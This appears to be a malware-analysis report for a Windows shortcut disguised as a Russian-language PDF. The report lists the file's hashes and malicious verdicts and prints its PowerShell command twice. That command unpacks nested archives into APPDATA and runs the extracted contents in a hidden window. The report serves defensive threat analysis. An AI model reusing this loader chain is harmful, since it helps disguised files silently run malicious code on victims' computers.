Malicious
Malicious

ТЛГ на убытие на переподготовку.pdf.lnk

LNK File
|
MD5: 32bdbf5c26e691cbbd451545bca52b56
|
Size: 2.49 KB
|
application/x-ms-shortcut

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
32bdbf5c26e691cbbd451545bca52b56
Sha1
63b27aeda63ea0ddf3db9b685d55ca01d5754357
Sha256
99ec6437f74eec19e33c1a0b4ac8826bcc44848f87cd1a1c2b379fae9df62de9
Sha384
bbf073f96c218e9b357d5cd5380d825d79d63b01a447477da350338bc52cd67d2d12783128dbbeeccaeb927914283af2
Sha512
f09b6c35ae01e1ad56a21f289b0ceff64d6f9adc7be14d2e732cde342079cf913b9a9f5044888b02429d79eee620f87f077c0ba688e6955733641461c4d7648a
SSDeep
48:8wEfRSnfzeKJ5QC7Cf77NQtwdBkHTJd0DdDabiMH:8wEfR8be7NvoHEDdDz
TLSH
D451561237FD461CF6F71B39AA7AA65158BAFD09EE22E64D1115604C0C60F20CE72B3B
File Structure
ТЛГ на убытие на переподготовку.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe $synchronizingPersistentUpdating=$env:USERPROFILE+'\Downloads\ТЛГ на убытие на переподготовку.pdf.zip';Expand-Archive $synchronizingPersistentUpdating -DestinationPath $env:APPDATA\dynamicUpdatingHashingScalingContext; $synchronizingPersistentUpdating=$env:APPDATA+'\dynamicUpdatingHashingScalingContext\FOUND.000\persistentHandlerHashingEncodingScalable.zip';Expand-Archive -Path $synchronizingPersistentUpdating -DestinationPath $env:APPDATA\logicpro; $adaptiveOptimizingDeployingDecodingEncrypting = gc $env:APPDATA\logicpro\scalingEncryptingEncoding; Start-Process -WindowStyle Hidden powershell $adaptiveOptimizingDeployingDecodingEncrypting
Deobfuscated PowerShell

$adaptiveOptimizingDeployingDecodingEncrypting
ТЛГ на убытие на переподготовку.pdf.lnk (2.49 KB)
File Structure
ТЛГ на убытие на переподготовку.pdf.lnk
Malicious
LNK CommandLine
Malicious
[PowerShell Command]
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe $synchronizingPersistentUpdating=$env:USERPROFILE+'\Downloads\ТЛГ на убытие на переподготовку.pdf.zip';Expand-Archive $synchronizingPersistentUpdating -DestinationPath $env:APPDATA\dynamicUpdatingHashingScalingContext; $synchronizingPersistentUpdating=$env:APPDATA+'\dynamicUpdatingHashingScalingContext\FOUND.000\persistentHandlerHashingEncodingScalable.zip';Expand-Archive -Path $synchronizingPersistentUpdating -DestinationPath $env:APPDATA\logicpro; $adaptiveOptimizingDeployingDecodingEncrypting = gc $env:APPDATA\logicpro\scalingEncryptingEncoding; Start-Process -WindowStyle Hidden powershell $adaptiveOptimizingDeployingDecodingEncrypting

Malicious

ТЛГ на убытие на переподготовку.pdf.lnk
Deobfuscated PowerShell

$adaptiveOptimizingDeployingDecodingEncrypting

Malicious

ТЛГ на убытие на переподготовку.pdf.lnk > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙